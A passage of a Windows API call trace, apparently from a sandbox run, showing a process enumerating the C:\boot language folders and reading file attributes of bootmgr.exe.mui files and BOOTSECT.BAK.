ftLastWriteTime.dwHighDateTime=0x1ca0428, nFileSizeHigh=0x0, nFileSizeLow=0xaa50)) returned 1 [0043.360] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.360] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.361] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.361] FindFirstFileW (in: lpFileName="c:\\boot\\es-es\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.361] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.361] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.362] GetFileAttributesExW (in: lpFileName="c:\\boot\\es-es\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552c0f00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050)) returned 1 [0043.362] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.362] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.362] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.362] FindFirstFileW (in: lpFileName="c:\\boot\\fi-fi\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.362] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.362] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.363] GetFileAttributesExW (in: lpFileName="c:\\boot\\fi-fi\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552c0f00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40)) returned 1 [0043.363] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.364] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.364] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.364] FindFirstFileW (in: lpFileName="c:\\boot\\fonts\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.364] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.365] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.365] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.365] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.365] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.366] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.366] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.366] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.366] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.366] FindFirstFileW (in: lpFileName="c:\\boot\\fr-fr\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.367] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.367] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.367] GetFileAttributesExW (in: lpFileName="c:\\boot\\fr-fr\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e7060, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40)) returned 1 [0043.367] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.367] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.367] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.367] FindFirstFileW (in: lpFileName="c:\\boot\\hu-hu\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.368] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.368] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.369] GetFileAttributesExW (in: lpFileName="c:\\boot\\hu-hu\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e7060, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240)) returned 1 [0043.369] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.370] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.370] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.370] FindFirstFileW (in: lpFileName="c:\\boot\\it-it\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.370] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.370] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.370] GetFileAttributesExW (in: lpFileName="c:\\boot\\it-it\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e7060, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0043.371] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.371] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.371] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.371] FindFirstFileW (in: lpFileName="c:\\boot\\ja-jp\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.372] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.372] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.372] GetFileAttributesExW (in: lpFileName="c:\\boot\\ja-jp\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5530d1c0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40)) returned 1 [0043.373] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.373] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.373] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.373] FindFirstFileW (in: lpFileName="c:\\boot\\ko-kr\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.373] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.373] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.373] GetFileAttributesExW (in: lpFileName="c:\\boot\\ko-kr\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5530d1c0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650)) returned 1 [0043.374] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.374] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.374] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.374] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.375] FindFirstFileW (in: lpFileName="c:\\boot\\nb-no\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.375] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.375] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.375] GetFileAttributesExW (in: lpFileName="c:\\boot\\nb-no\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55333320, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850)) returned 1 [0043.376] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.376] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.376] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.376] FindFirstFileW (in: lpFileName="c:\\boot\\nl-nl\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.377] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.377] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.377] GetFileAttributesExW (in: lpFileName="c:\\boot\\nl-nl\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55333320, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0043.378] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.378] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.378] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.378] FindFirstFileW (in: lpFileName="c:\\boot\\pl-pl\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.378] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.378] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.379] GetFileAttributesExW (in: lpFileName="c:\\boot\\pl-pl\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55359480, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0043.379] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.379] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.379] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.379] FindFirstFileW (in: lpFileName="c:\\boot\\pt-br\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.379] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.379] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.380] GetFileAttributesExW (in: lpFileName="c:\\boot\\pt-br\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55359480, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040)) returned 1 [0043.380] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.381] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.381] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.381] FindFirstFileW (in: lpFileName="c:\\boot\\pt-pt\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.381] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.381] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.381] GetFileAttributesExW (in: lpFileName="c:\\boot\\pt-pt\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55359480, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40)) returned 1 [0043.382] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.382] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.382] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.382] FindFirstFileW (in: lpFileName="c:\\boot\\ru-ru\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.382] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.382] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.382] GetFileAttributesExW (in: lpFileName="c:\\boot\\ru-ru\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5537f5e0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050)) returned 1 [0043.383] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.383] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.383] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.383] FindFirstFileW (in: lpFileName="c:\\boot\\sv-se\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.384] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.384] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.384] GetFileAttributesExW (in: lpFileName="c:\\boot\\sv-se\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553a5740, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0043.384] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.384] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.384] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.385] FindFirstFileW (in: lpFileName="c:\\boot\\tr-tr\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.385] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.385] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.386] GetFileAttributesExW (in: lpFileName="c:\\boot\\tr-tr\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553a5740, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440)) returned 1 [0043.386] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.386] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.386] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.387] FindFirstFileW (in: lpFileName="c:\\boot\\zh-cn\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.387] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.387] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.387] GetFileAttributesExW (in: lpFileName="c:\\boot\\zh-cn\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440)) returned 1 [0043.387] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.387] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.387] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.387] FindFirstFileW (in: lpFileName="c:\\boot\\zh-hk\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.388] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.388] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.388] GetFileAttributesExW (in: lpFileName="c:\\boot\\zh-hk\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250)) returned 1 [0043.389] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.389] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.389] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.389] FindFirstFileW (in: lpFileName="c:\\boot\\zh-tw\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.389] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.389] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.389] GetFileAttributesExW (in: lpFileName="c:\\boot\\zh-tw\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240)) returned 1 [0043.390] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.390] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.390] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 0 [0043.390] FindClose (in: hFindFile=0x284da0 | out: hFindFile=0x284da0) returned 1 [0043.390] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.390] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.390] GetFileAttributesExW (in: lpFileName="c:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x12ee9c | out: lpFileInformation=0x12ee9c*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x58b95c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x58b95c40, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x58b95c40, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0043.390] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.391] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.391] FindFirstFileW (in: lpFileName="c:\\documents and settings\\\\*", lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 0xffffffff [0043.391] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.391] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.391] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.392] FindNextFileW (in: hFindFile=0x2838e8, 